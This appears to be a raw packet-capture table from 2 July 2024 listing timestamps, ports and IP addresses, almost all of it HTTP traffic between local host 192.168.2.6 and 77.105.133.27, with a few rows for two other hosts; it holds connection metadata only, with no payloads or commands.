Jul 2, 2024 00:05:08.204930067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.204930067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.204943895 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205094099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205105066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205115080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205127001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205137014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205142975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205153942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205164909 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205178022 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205178022 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205182076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205200911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205214024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205241919 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205332041 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205344915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205354929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205365896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205375910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205378056 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205387115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205396891 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205406904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205416918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205424070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205424070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205430984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205436945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205442905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205454111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205467939 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205501080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205703020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205749989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205760956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205795050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205795050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205811024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205821991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205832958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205842018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205878973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205878973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205907106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205918074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205929995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.205954075 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.205965042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206027985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206038952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206048965 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206059933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206068039 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206078053 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206104994 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206290007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206300020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206310034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206321001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206332922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206342936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206353903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206358910 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206358910 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206365108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206394911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206394911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206423044 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206556082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206572056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206582069 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206592083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206602097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206609964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206609964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206612110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206623077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206624985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206634045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206650019 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206656933 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206660986 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206671000 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206681013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206691980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206693888 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206693888 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206718922 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206753969 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.206974030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206984997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.206995964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207005978 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207016945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207026958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207037926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207039118 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207051992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207076073 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207077026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207303047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207314014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207329988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207340956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207350969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207360029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207360029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207367897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207380056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207391024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207391977 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207405090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207410097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207426071 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207442045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207442045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207451105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207461119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207461119 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207472086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207482100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207489014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207492113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207501888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207513094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207520962 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207535982 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207555056 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207603931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207618952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207629919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207662106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207679987 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207688093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207699060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207709074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207719088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207730055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207741976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207765102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207765102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207809925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207906961 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207918882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207928896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207941055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207957983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207959890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207967997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207978964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207986116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.207988977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207998991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.207999945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208009958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208019972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208029985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208040953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208051920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208051920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208074093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208074093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208209991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208220959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208230972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208240986 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208271027 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208286047 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208421946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208432913 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208444118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208468914 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208494902 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208632946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208643913 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208653927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208689928 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208689928 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208776951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208789110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208798885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208808899 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208826065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208856106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208904982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208915949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208925962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.208957911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.208981991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209105968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209116936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209127903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209137917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209151983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209161997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209170103 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209170103 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209172964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209184885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209206104 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209217072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209299088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209310055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209320068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209330082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209342957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209355116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209355116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209388018 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209580898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209665060 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209685087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209696054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209706068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209716082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209726095 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209743023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209749937 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209749937 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209753990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209764957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209775925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209780931 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209785938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209798098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.209800959 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209856987 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.209856987 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210052013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210062981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210072994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210086107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210095882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210108042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210118055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210128069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210128069 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210128069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210139036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210150003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210154057 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210160017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210170984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210176945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210181952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210211992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210223913 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210479975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210490942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210500002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210510969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210511923 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.210530996 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210549116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210577965 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.210757971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210772038 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210782051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210793018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210803032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210812092 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210827112 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210853100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.210988045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.210999012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211009026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211020947 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211031914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211041927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211051941 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211059093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211059093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211065054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211076975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211087942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211091995 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211091995 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211121082 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211150885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211514950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211525917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211534977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211545944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211555958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211565018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211575031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211585999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.211587906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211587906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211612940 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.211631060 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212408066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212419987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212429047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212440014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212450981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212460995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212471008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212477922 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212477922 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212486029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212505102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212523937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212524891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212533951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212544918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212554932 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212565899 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212574005 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212577105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212589025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212599039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212609053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212619066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212619066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212620020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212630987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.212646961 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212646961 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.212694883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.216017962 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.216099977 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.222882032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.222961903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.222984076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.222994089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223022938 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223036051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223047972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223058939 CEST	80	49717	77.91.77.80	192.168.2.6
